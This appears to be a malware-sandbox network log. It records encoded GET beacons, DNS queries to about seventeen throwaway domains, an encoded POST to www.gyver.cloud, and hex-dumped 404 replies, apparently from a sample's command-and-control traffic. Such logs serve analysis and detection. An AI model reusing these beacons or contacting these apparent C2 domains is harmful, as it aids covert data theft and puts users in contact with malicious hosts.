Source: global traffic	HTTP traffic detected: GET /y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.23ddv.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gyver.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vlyra.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tyai36.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.indeks.spaceConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kiristyle.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tmglift.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.kapiextra.com
Source: global traffic	DNS traffic detected: DNS query: www.ayna-pro.shop
Source: global traffic	DNS traffic detected: DNS query: www.23ddv.top
Source: global traffic	DNS traffic detected: DNS query: www.gyver.cloud
Source: global traffic	DNS traffic detected: DNS query: www.vlyra.online
Source: global traffic	DNS traffic detected: DNS query: www.tyai36.top
Source: global traffic	DNS traffic detected: DNS query: www.950021.com
Source: global traffic	DNS traffic detected: DNS query: www.indeks.space
Source: global traffic	DNS traffic detected: DNS query: www.kiristyle.shop
Source: global traffic	DNS traffic detected: DNS query: www.tmglift.xyz
Source: global traffic	DNS traffic detected: DNS query: www.esistiliya.online
Source: global traffic	DNS traffic detected: DNS query: www.theaji.shop
Source: global traffic	DNS traffic detected: DNS query: www.bola88site.one
Source: global traffic	DNS traffic detected: DNS query: www.policydetails.online
Source: global traffic	DNS traffic detected: DNS query: www.terrearcenciel.online
Source: global traffic	DNS traffic detected: DNS query: www.at8l4.shop
Source: global traffic	DNS traffic detected: DNS query: www.dom-2.online

Source: unknown

HTTP traffic detected: POST /7arp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.gyver.cloudOrigin: http://www.gyver.cloudReferer: http://www.gyver.cloud/7arp/Content-Length: 205Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 4c 66 2f 58 6e 77 39 56 75 5a 56 6b 54 77 42 4b 37 35 6a 52 67 5a 7a 61 35 41 30 59 32 66 51 66 6f 77 4b 70 35 33 39 45 44 4d 6a 5a 78 49 37 31 48 66 72 51 31 57 79 4a 2b 59 52 45 55 47 61 31 78 7a 4b 6b 72 50 4e 59 45 4d 41 6d 54 34 61 4d 65 6d 63 4e 69 7a 62 59 2b 37 6e 45 37 4e 71 49 65 66 35 32 50 36 52 43 2b 5a 58 4e 6b 41 46 6a 70 71 47 57 50 38 78 76 4b 71 59 39 63 63 4c 4c 79 46 73 47 45 5a 37 47 50 46 65 37 51 78 42 56 79 57 33 6e 75 5a 51 7a 35 31 66 72 6b 6b 54 42 41 34 6e 6f 43 4b 35 62 34 72 69 45 4b 30 5a 79 7a 59 30 32 76 77 3d 3d Data Ascii: AvLLLbOh=Qdac4tatAq89Lf/Xnw9VuZVkTwBK75jRgZza5A0Y2fQfowKp539EDMjZxI71HfrQ1WyJ+YREUGa1xzKkrPNYEMAmT4aMemcNizbY+7nE7NqIef52P6RC+ZXNkAFjpqGWP8xvKqY9ccLLyFsGEZ7GPFe7QxBVyW3nuZQz51frkkTBA4noCK5b4riEK0ZyzY02vw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:46:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:47:04 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:47:07 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:47:10 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:47:12 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:18 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:21 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
